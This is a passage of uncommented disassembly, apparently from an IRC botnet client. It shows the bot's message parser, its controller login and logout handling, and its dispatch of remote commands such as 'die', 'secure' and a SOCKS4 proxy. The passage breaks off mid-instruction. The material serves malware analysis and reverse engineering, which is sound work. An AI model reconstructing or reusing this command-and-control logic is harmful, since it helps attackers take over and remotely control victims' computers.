mov [ebp+var_A4], eax
inc edi
loc_4079BA: ; CODE XREF: sub_4078FA+D4�j
push esi
push ebx
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4079BA
mov ebx, [ebp+var_A4]
xor esi, esi
cmp ebx, esi
jz loc_407B7B
cmp [ebp+var_A0], esi
jz loc_407B7B
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_4AC]
push 1Fh
rep stosd
pop edx
loc_4079FC: ; CODE XREF: sub_4078FA+13A�j
lea ecx, [ebp+edx*4+var_A4]
mov eax, [ecx]
cmp eax, esi
jz short loc_407A33
cmp byte ptr [eax], 2Dh
jnz short loc_407A36
cmp byte ptr [eax+2], 0
jnz short loc_407A36
movsx edi, byte ptr [eax+1]
and byte ptr [eax], 0
and byte ptr [eax+1], 0
and byte ptr [eax+2], 0
mov [ecx], esi
mov ebx, [ebp+var_A4]
mov [ebp+edi+var_4AC], 1
loc_407A33: ; CODE XREF: sub_4078FA+10D�j
dec edx
jns short loc_4079FC
loc_407A36: ; CODE XREF: sub_4078FA+112�j
; sub_4078FA+118�j
cmp [ebp+var_439], 0
jz short loc_407A46
mov [ebp+var_C], 1
loc_407A46: ; CODE XREF: sub_4078FA+143�j
cmp [ebp+var_43E], 0
jz short loc_407A59
mov [ebp+var_C], esi
mov [ebp+var_4], 1
loc_407A59: ; CODE XREF: sub_4078FA+153�j
cmp byte ptr [ebx], 0Ah
jz short loc_407A93
push 7Fh
lea eax, [ebp+var_C04]
push ebx
push eax
call sub_412C40
push 17h
lea eax, [ebx+1]
push eax
lea eax, [ebp+var_E0]
push eax
call sub_412C40
lea eax, [ebp+var_E0]
push offset asc_4264C0 ; "!"
push eax
call sub_413859
add esp, 20h
loc_407A93: ; CODE XREF: sub_4078FA+162�j
push 5
mov edi, ebx
mov esi, offset aPing ; "PING"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407AE1
push [ebp+var_A0]
mov byte ptr [ebx+1], 4Fh
push offset aPongS ; "PONG %s\r\n"
push [ebp+arg_4]
call sub_404592
mov eax, [ebp+arg_20]
add esp, 0Ch
cmp dword ptr [eax], 0
jnz loc_407B7B
loc_407AC9: ; CODE XREF: sub_4078FA+3DA�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
loc_407AD4: ; CODE XREF: sub_4078FA+6D6�j
; sub_4078FA+93C�j ...
push [ebp+arg_4]
call sub_404592
jmp loc_40BE11
; ---------------------------------------------------------------------------
loc_407AE1: ; CODE XREF: sub_4078FA+1A7�j
mov edx, [ebp+var_A0]
push 4
pop eax
mov edi, edx
mov esi, offset a001 ; "001"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a005 ; "005"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jz loc_40D1A7
mov edi, edx
mov esi, offset a302 ; "302"
mov ecx, eax
xor ebx, ebx
repe cmpsb
jnz short loc_407B44
push offset a@ ; "@"
push [ebp+var_98]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_407B7B
push 9Fh
inc eax
push eax
push [ebp+arg_1C]
jmp loc_407DE9
; ---------------------------------------------------------------------------
loc_407B44: ; CODE XREF: sub_4078FA+223�j
mov ecx, eax
mov edi, edx
mov esi, offset a433 ; "433"
xor eax, eax
repe cmpsb
jnz short loc_407B83
push eax
push dword_42AE68
push dword_42AE64
push [ebp+arg_10]
call sub_40E7B0
push [ebp+arg_10]
push offset aNickS_0 ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_404592
add esp, 1Ch
loc_407B7B: ; CODE XREF: sub_4078FA+E0�j
; sub_4078FA+EC�j ...
xor eax, eax
loc_407B7D: ; CODE XREF: sub_4078FA+55�j
inc eax
loc_407B7E: ; CODE XREF: sub_4078FA+172D�j
; sub_4078FA+2E43�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407B83: ; CODE XREF: sub_4078FA+257�j
mov edi, [ebp+arg_18]
push 2
pop edx
loc_407B89: ; CODE XREF: sub_4078FA+2D0�j
lea eax, [ebp+var_C04]
mov esi, edi
loc_407B91: ; CODE XREF: sub_4078FA+2B3�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407BB3
test cl, cl
jz short loc_407BAF
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407BB3
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407B91
loc_407BAF: ; CODE XREF: sub_4078FA+2A1�j
xor eax, eax
jmp short loc_407BB8
; ---------------------------------------------------------------------------
loc_407BB3: ; CODE XREF: sub_4078FA+29D�j
; sub_4078FA+2AB�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407BB8: ; CODE XREF: sub_4078FA+2B7�j
test eax, eax
jnz short loc_407BC3
mov [ebp+var_20], 1
loc_407BC3: ; CODE XREF: sub_4078FA+2C0�j
add edi, 80h
dec edx
jnz short loc_407B89
mov edi, [ebp+var_A0]
push 5
mov esi, offset aKick ; "KICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407CD9
mov edi, [ebp+arg_18]
push 2
pop ebx
loc_407BEA: ; CODE XREF: sub_4078FA+396�j
cmp byte ptr [edi], 0
jz loc_407C89
push 7Fh
lea eax, [ebp+var_C04]
push edi
push eax
call sub_412C40
add esp, 0Ch
cmp [ebp+var_98], 0
jz short loc_407C89
mov esi, [ebp+var_98]
lea eax, [ebp+var_E0]
loc_407C1A: ; CODE XREF: sub_4078FA+33C�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407C3C
test cl, cl
jz short loc_407C38
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407C3C
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C1A
loc_407C38: ; CODE XREF: sub_4078FA+32A�j
xor eax, eax
jmp short loc_407C41
; ---------------------------------------------------------------------------
loc_407C3C: ; CODE XREF: sub_4078FA+326�j
; sub_4078FA+334�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407C41: ; CODE XREF: sub_4078FA+340�j
test eax, eax
jnz short loc_407C89
and [edi], al
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLogge ; "[MAIN]: User %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
lea eax, [ebp+var_E0]
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
push [ebp+arg_4]
call sub_404592
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
add esp, 20h
loc_407C89: ; CODE XREF: sub_4078FA+2F3�j
; sub_4078FA+312�j ...
add edi, 80h
dec ebx
jnz loc_407BEA
mov esi, [ebp+var_98]
mov eax, [ebp+arg_10]
loc_407C9F: ; CODE XREF: sub_4078FA+3C1�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407CC1
test cl, cl
jz short loc_407CBD
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407CC1
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407C9F
loc_407CBD: ; CODE XREF: sub_4078FA+3AF�j
xor eax, eax
jmp short loc_407CC6
; ---------------------------------------------------------------------------
loc_407CC1: ; CODE XREF: sub_4078FA+3AB�j
; sub_4078FA+3B9�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407CC6: ; CODE XREF: sub_4078FA+3C5�j
test eax, eax
jnz loc_407B7B
mov eax, [ebp+arg_20]
and dword ptr [eax], 0
jmp loc_407AC9
; ---------------------------------------------------------------------------
loc_407CD9: ; CODE XREF: sub_4078FA+2E4�j
mov edi, [ebp+var_A0]
push 5
mov esi, offset aNick ; "NICK"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407EB9
mov eax, [ebp+var_9C]
or [ebp+var_1C], 0FFFFFFFFh
mov ebx, [ebp+arg_18]
inc eax
sub [ebp+var_1C], eax
mov [ebp+arg_0], eax
mov [ebp+var_20], 2
loc_407D0C: ; CODE XREF: sub_4078FA+4A3�j
lea eax, [ebp+var_C04]
mov esi, ebx
loc_407D14: ; CODE XREF: sub_4078FA+436�j
mov dl, [esi]
mov cl, dl
cmp dl, [eax]
jnz short loc_407D36
test cl, cl
jz short loc_407D32
mov dl, [esi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_407D36
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407D14
loc_407D32: ; CODE XREF: sub_4078FA+424�j
xor eax, eax
jmp short loc_407D3B
; ---------------------------------------------------------------------------
loc_407D36: ; CODE XREF: sub_4078FA+420�j
; sub_4078FA+42E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407D3B: ; CODE XREF: sub_4078FA+43A�j
test eax, eax
jnz short loc_407D94
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_407D94
mov eax, [ebp+var_1C]
mov edx, [ebp+arg_0]
lea ecx, [ebx+2]
mov byte ptr [ebx], 3Ah
lea esi, [eax+ecx]
loc_407D64: ; CODE XREF: sub_4078FA+472�j
mov al, [edx]
mov [esi+edx], al
inc edx
test al, al
jnz short loc_407D64
mov eax, edi
mov esi, edi
loc_407D72: ; CODE XREF: sub_4078FA+47D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_407D72
sub eax, esi
dec ecx
loc_407D7C: ; CODE XREF: sub_4078FA+488�j
mov dl, [ecx+1]
inc ecx
test dl, dl
jnz short loc_407D7C
mov edi, ecx
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_407D94: ; CODE XREF: sub_4078FA+443�j
; sub_4078FA+459�j
add ebx, 80h
dec [ebp+var_20]
jnz loc_407D0C
cmp [ebp+arg_0], 0
jz loc_407B7B
mov esi, [ebp+arg_10]
lea eax, [ebp+var_E0]
loc_407DB6: ; CODE XREF: sub_4078FA+4D8�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407DD8
test cl, cl
jz short loc_407DD4
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407DD8
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407DB6
loc_407DD4: ; CODE XREF: sub_4078FA+4C6�j
xor eax, eax
jmp short loc_407DDD
; ---------------------------------------------------------------------------
loc_407DD8: ; CODE XREF: sub_4078FA+4C2�j
; sub_4078FA+4D0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407DDD: ; CODE XREF: sub_4078FA+4DC�j
test eax, eax
jnz short loc_407DF6
push 0Fh
push [ebp+arg_0]
push [ebp+arg_10]
loc_407DE9: ; CODE XREF: sub_4078FA+245�j
call sub_412C40
add esp, 0Ch
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407DF6: ; CODE XREF: sub_4078FA+4E5�j
mov edx, [ebp+arg_18]
xor edi, edi
loc_407DFB: ; CODE XREF: sub_4078FA+543�j
cmp byte ptr [edx], 0
jz short loc_407E33
lea eax, [ebp+var_C04]
mov esi, edx
loc_407E08: ; CODE XREF: sub_4078FA+52A�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_407E2A
test cl, cl
jz short loc_407E26
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_407E2A
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_407E08
loc_407E26: ; CODE XREF: sub_4078FA+518�j
xor eax, eax
jmp short loc_407E2F
; ---------------------------------------------------------------------------
loc_407E2A: ; CODE XREF: sub_4078FA+514�j
; sub_4078FA+522�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407E2F: ; CODE XREF: sub_4078FA+52E�j
test eax, eax
jz short loc_407E44
loc_407E33: ; CODE XREF: sub_4078FA+504�j
inc edi
add edx, 80h
cmp edi, 2
jl short loc_407DFB
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: sub_4078FA+537�j
lea eax, [ebp+var_C04]
push 21h
push eax
call sub_413F30
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_407B7B
mov ecx, [ebp+arg_0]
lea edx, [ecx+1]
loc_407E64: ; CODE XREF: sub_4078FA+56F�j
mov al, [ecx]
inc ecx
test al, al
jnz short loc_407E64
sub ecx, edx
mov edx, ebx
lea esi, [edx+1]
loc_407E72: ; CODE XREF: sub_4078FA+57D�j
mov al, [edx]
inc edx
test al, al
jnz short loc_407E72
sub edx, esi
add edx, ecx
cmp edx, 7Eh
ja loc_407B7B
push ebx
push [ebp+arg_0]
shl edi, 7
add edi, [ebp+arg_18]
push offset aSS_2 ; ":%s%s"
push edi
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_410]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4045DD
add esp, 24h
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_407EB9: ; CODE XREF: sub_4078FA+3F1�j
mov edi, [ebp+var_A0]
mov ebx, offset aPart ; "PART"
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_407EE3
mov edi, [ebp+var_A0]
push 5
mov esi, offset aQuit ; "QUIT"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_407F33
loc_407EE3: ; CODE XREF: sub_4078FA+5D3�j
mov esi, [ebp+arg_18]
xor eax, eax
mov [ebp+var_10], esi
loc_407EEB: ; CODE XREF: sub_4078FA+637�j
cmp byte ptr [esi], 0
jz short loc_407F21
mov edi, [ebp+var_A4]
loc_407EF6: ; CODE XREF: sub_4078FA+618�j
mov dl, [esi]
mov cl, dl
cmp dl, [edi]
jnz short loc_407F18
test cl, cl
jz short loc_407F14
mov dl, [esi+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_407F18
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_407EF6
loc_407F14: ; CODE XREF: sub_4078FA+606�j
xor ecx, ecx
jmp short loc_407F1D
; ---------------------------------------------------------------------------
loc_407F18: ; CODE XREF: sub_4078FA+602�j
; sub_4078FA+610�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_407F1D: ; CODE XREF: sub_4078FA+61C�j
test ecx, ecx
jz short loc_407F76
loc_407F21: ; CODE XREF: sub_4078FA+5F4�j
mov esi, [ebp+var_10]
inc eax
add esi, 80h
cmp eax, 2
mov [ebp+var_10], esi
jl short loc_407EEB
loc_407F33: ; CODE XREF: sub_4078FA+5E7�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset a353 ; "353"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407FF7
mov esi, [ebp+var_94]
mov eax, [ebp+arg_8]
loc_407F54: ; CODE XREF: sub_4078FA+676�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_407FD5
test cl, cl
jz short loc_407F72
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_407FD5
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_407F54
loc_407F72: ; CODE XREF: sub_4078FA+664�j
xor eax, eax
jmp short loc_407FDA
; ---------------------------------------------------------------------------
loc_407F76: ; CODE XREF: sub_4078FA+625�j
mov ecx, [ebp+arg_18]
shl eax, 7
and byte ptr [eax+ecx], 0
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_2E0]
push offset aMainUserSLog_0 ; "[MAIN]: User: %s logged out."
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
mov edi, [ebp+var_A0]
add esp, 10h
push 5
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jnz loc_407B7B
lea eax, [ebp+var_2E0]
push eax
mov eax, [ebp+var_A4]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_407FD5: ; CODE XREF: sub_4078FA+660�j
; sub_4078FA+66E�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_407FDA: ; CODE XREF: sub_4078FA+67A�j
test eax, eax
jnz short loc_407FE7
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_407FE7: ; CODE XREF: sub_4078FA+6E2�j
push [ebp+var_94]
push offset aMainJoinedChan ; "[MAIN]: Joined channel: %s."
jmp loc_40D19B
; ---------------------------------------------------------------------------
loc_407FF7: ; CODE XREF: sub_4078FA+64B�j
mov edi, [ebp+var_A0]
mov eax, offset aPrivmsg ; "PRIVMSG"
push 8
xor edx, edx
mov esi, eax
pop ecx
repe cmpsb
mov edx, offset aNotice ; "NOTICE"
jz short loc_408047
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor ebx, ebx
repe cmpsb
jz short loc_408047
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40CFE2
cmp dword_42AE50, ebx
jz loc_40CFE2
loc_408047: ; CODE XREF: sub_4078FA+716�j
; sub_4078FA+727�j
mov edi, [ebp+var_A0]
mov ebx, [ebp+var_1C]
mov esi, eax
push 8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jz loc_40814C
mov eax, [ebp+var_98]
inc [ebp+var_94]
mov [ebp+var_1C], 4
mov [ebp+var_9C], eax
loc_40808D: ; CODE XREF: sub_4078FA+910�j
; sub_4078FA+94F�j ...
mov ebx, [ebp+var_1C]
shl ebx, 2
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
lea edx, [ecx+1]
mov [eax], edx
mov al, byte_42AE5C
cmp [ecx], al
mov [ebp+var_A8], edx
jnz loc_407B7B
push 6
mov edi, edx
mov esi, offset aLogin ; "login"
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
push 2
mov edi, edx
mov esi, offset dword_4263E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_40CFEA
cmp [ebp+var_20], eax
jnz short loc_4080F9
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40CFE2
loc_4080F9: ; CODE XREF: sub_4078FA+7E5�j
xor eax, eax
cmp [ebp+arg_28], eax
jnz loc_40CFE2
cmp dword_42B280, eax
mov [ebp+var_10], eax
jle loc_408417
mov [ebp+var_8], offset dword_479030
loc_40811A: ; CODE XREF: sub_4078FA+99A�j
mov edi, [ebp+var_8]
mov esi, edx
loc_40811F: ; CODE XREF: sub_4078FA+849�j
mov cl, [edi]
mov al, cl
cmp cl, [esi]
jnz loc_408278
test al, al
jz short loc_408145
mov cl, [edi+1]
mov al, cl
cmp cl, [esi+1]
jnz loc_408278
inc edi
inc edi
inc esi
inc esi
test al, al
jnz short loc_40811F
loc_408145: ; CODE XREF: sub_4078FA+833�j
xor eax, eax
jmp loc_40827D
; ---------------------------------------------------------------------------
loc_40814C: ; CODE XREF: sub_4078FA+75F�j
; sub_4078FA+774�j
mov edi, [ebp+var_A0]
push 7
mov esi, edx
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_408164
mov [ebp+var_4], 1
loc_408164: ; CODE XREF: sub_4078FA+861�j
cmp [ebp+var_9C], 0
jz loc_407B7B
push offset dword_4263E4
push [ebp+var_9C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40818D
cmp [ebp+var_4], 0
jz short loc_408199
loc_40818D: ; CODE XREF: sub_4078FA+88B�j
lea eax, [ebp+var_E0]
mov [ebp+var_9C], eax
loc_408199: ; CODE XREF: sub_4078FA+891�j
cmp [ebp+var_98], 0
jz loc_407B7B
inc [ebp+var_98]
jz short loc_4081E8
cmp [ebp+arg_10], 0
jz short loc_4081E8
lea eax, [ebp+var_3AC]
lea edx, [eax+1]
loc_4081BD: ; CODE XREF: sub_4078FA+8C8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4081BD
sub eax, edx
push eax
push [ebp+var_98]
lea eax, [ebp+var_3AC]
push eax
call sub_414380
add esp, 0Ch
mov ebx, eax
neg ebx
sbb ebx, ebx
add ebx, 4
mov [ebp+var_1C], ebx
loc_4081E8: ; CODE XREF: sub_4078FA+8B2�j
; sub_4078FA+8B8�j
mov eax, ebx
shl eax, 2
mov edx, [ebp+eax+var_A4]
test edx, edx
jz loc_407B7B
push 0Ah
mov edi, edx
mov esi, offset dword_4263D8
pop ecx
xor ebx, ebx
repe cmpsb
jnz loc_40808D
mov esi, [ebp+var_9C]
mov bl, [esi]
cmp bl, 23h
jz short loc_40823B
mov ecx, dword_479BBC
mov ecx, off_42AF40[ecx*4]
cmp byte ptr [ecx], 0
jz short loc_40823B
push ecx
push esi
push offset dword_4263BC
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_40823B: ; CODE XREF: sub_4078FA+921�j
; sub_4078FA+933�j
mov edi, edx
push 6
mov esi, offset dword_4263B4
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40808D
mov eax, [ebp+eax+var_A0]
test eax, eax
jz loc_40808D
cmp bl, 23h
jz loc_40808D
push eax
push [ebp+var_9C]
push offset dword_42639C
jmp loc_407AD4
; ---------------------------------------------------------------------------
loc_408278: ; CODE XREF: sub_4078FA+82B�j
; sub_4078FA+83D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40827D: ; CODE XREF: sub_4078FA+84D�j
test eax, eax
jz short loc_40829F
inc [ebp+var_10]
mov eax, [ebp+var_10]
add [ebp+var_8], 0B8h
cmp eax, dword_42B280
jl loc_40811A
jmp loc_408417
; ---------------------------------------------------------------------------
loc_40829F: ; CODE XREF: sub_4078FA+985�j
push offset asc_4246B4 ; " :"
push [ebp+arg_0]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
mov esi, [ebp+var_10]
mov cl, byte_42AE5C
imul esi, 0B8h
mov [eax+2], cl
mov cl, byte_42AE5C
mov [eax+3], cl
push 9Fh
lea ecx, dword_479048[esi]
push ecx
add eax, 4
push eax
call sub_412C40
lea eax, dword_479030[esi]
lea edi, [ebp+ebx+var_64]
add esp, 0Ch
mov [ebp+var_10], 0Fh
mov [ebp+var_AC], eax
mov esi, edi
loc_408302: ; CODE XREF: sub_4078FA+AAF�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_1 ; "$%d-"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_40836E
cmp dword ptr [esi], 0
jz short loc_408373
mov eax, [ebp+var_AC]
lea edx, [eax+1]
loc_40833A: ; CODE XREF: sub_4078FA+A45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40833A
sub eax, edx
add [ebp+var_14], eax
jz short loc_40839F
push dword ptr [esi-4]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz short loc_40839F
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
jmp short loc_40839F
; ---------------------------------------------------------------------------
loc_40836E: ; CODE XREF: sub_4078FA+A30�j
cmp dword ptr [esi], 0
jnz short loc_40839F
loc_408373: ; CODE XREF: sub_4078FA+A35�j
push 2
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_24]
push eax
call sub_412C40
and [ebp+var_22], 0
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 18h
loc_40839F: ; CODE XREF: sub_4078FA+A4C�j
; sub_4078FA+A5D�j ...
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg loc_408302
mov [ebp+var_10], 10h
mov esi, edi
loc_4083B8: ; CODE XREF: sub_4078FA+B0B�j
push [ebp+var_10]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d"
push eax
call sub_412BB5
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_413920
add esp, 14h
test eax, eax
jz short loc_4083FB
mov eax, [esi]
test eax, eax
jz short loc_4083FB
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
add esp, 0Ch
loc_4083FB: ; CODE XREF: sub_4078FA+AE6�j
; sub_4078FA+AEC�j
dec [ebp+var_10]
sub esi, 4
cmp [ebp+var_10], 0
jg short loc_4083B8
mov edx, [ebp+var_A8]
mov [ebp+var_AC], 1
loc_408417: ; CODE XREF: sub_4078FA+813�j
; sub_4078FA+9A0�j
mov al, byte_42AE5C
cmp [edx], al
jz short loc_40842D
cmp [ebp+var_AC], 0
jz loc_408609
loc_40842D: ; CODE XREF: sub_4078FA+B24�j
push [ebp+arg_10]
mov edi, [ebp+arg_0]
push offset aMe ; "$me"
push edi
call sub_40556E
lea eax, [ebp+var_E0]
push eax
push offset aUser_2 ; "$user"
push edi
call sub_40556E
push [ebp+var_9C]
push offset aChan ; "$chan"
push edi
call sub_40556E
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
push offset aRndnick_0 ; "$rndnick"
push edi
call sub_40556E
add esp, 40h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push edi
call sub_40556E
mov esi, offset aChr ; "$chr("
push esi
push edi
call sub_413920
add esp, 14h
jmp loc_40858D
; ---------------------------------------------------------------------------
loc_4084A4: ; CODE XREF: sub_4078FA+C95�j
push esi
push [ebp+arg_0]
call sub_413920
mov [ebp+var_A8], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_B8]
push offset asc_42635C ; ")"
push eax
call sub_413859
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_4084EB
cmp [ebp+var_B8], 39h
jle short loc_408501
loc_4084EB: ; CODE XREF: sub_4078FA+BE6�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_412C40
add esp, 0Ch
loc_408501: ; CODE XREF: sub_4078FA+BEF�j
lea eax, [ebp+var_B8]
push eax
call sub_412F42
test eax, eax
pop ecx
jle short loc_408524
lea eax, [ebp+var_B8]
push eax
call sub_412F42
pop ecx
mov [ebp+var_24], al
jmp short loc_408535
; ---------------------------------------------------------------------------
loc_408524: ; CODE XREF: sub_4078FA+C16�j
call sub_412D71
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_24], dl
loc_408535: ; CODE XREF: sub_4078FA+C28�j
and [ebp+var_23], 0
lea eax, [ebp+var_B8]
lea edx, [eax+1]
loc_408542: ; CODE XREF: sub_4078FA+C4D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_408542
sub eax, edx
mov ecx, eax
xor eax, eax
lea edi, [ebp+var_B8]
stosd
stosd
add ecx, 6
push ecx
push [ebp+var_A8]
stosd
lea eax, [ebp+var_B8]
push eax
call sub_412C40
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40556E
push esi
push [ebp+arg_0]
call sub_413920
add esp, 20h
loc_40858D: ; CODE XREF: sub_4078FA+BA5�j
test eax, eax
jnz loc_4084A4
mov esi, 1FFh
push esi
push [ebp+arg_0]
lea eax, [ebp+var_17E8]
push eax
call sub_412C40
push esi
lea eax, [ebp+var_17E8]
push eax
lea eax, [ebp+var_1BE8]
push eax
call sub_412C40
mov esi, offset asc_41FA74 ; " "
lea eax, [ebp+var_1BE8]
push esi
push eax
call sub_413859
xor edi, edi
add esp, 20h
mov [ebp+var_A4], eax
inc edi
loc_4085DC: ; CODE XREF: sub_4078FA+CF7�j
push esi
push 0
call sub_413859
mov [ebp+edi*4+var_A4], eax
inc edi
cmp edi, 20h
pop ecx
pop ecx
jl short loc_4085DC
lea eax, [ebp+ebx+var_A4]
mov ecx, [eax]
test ecx, ecx
jz loc_407B7B
add ecx, 3
mov [eax], ecx
loc_408609: ; CODE XREF: sub_4078FA+B2D�j
mov eax, [ebp+ebx+var_A4]
push 8
mov edi, eax
mov esi, offset aRndnick ; "rndnick"
pop ecx
xor edx, edx
repe cmpsb
mov [ebp+var_20], eax
jz loc_40CF95
push 3
mov edi, eax
mov esi, offset aRn ; "rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40CF95
push 4
mov edi, eax
mov esi, offset aDie ; "die"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 2
mov edi, eax
mov esi, offset aD ; "d"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C4A9
push 7
mov edi, eax
mov esi, offset aLogout ; "logout"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 3
mov edi, eax
mov esi, offset aLo ; "lo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C3BB
push 8
mov edi, eax
mov esi, offset aVersion ; "version"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 4
mov edi, eax
mov esi, offset aVer ; "ver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C39D
push 7
mov edi, eax
mov esi, offset aSecure ; "secure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 4
mov edi, eax
mov esi, offset aSec ; "sec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 9
mov edi, eax
mov esi, offset aUnsecure ; "unsecure"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 6
mov edi, eax
mov esi, offset aUnsec ; "unsec"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40C28F
push 7
mov edi, eax
mov esi, offset aSocks4 ; "socks4"
pop ecx
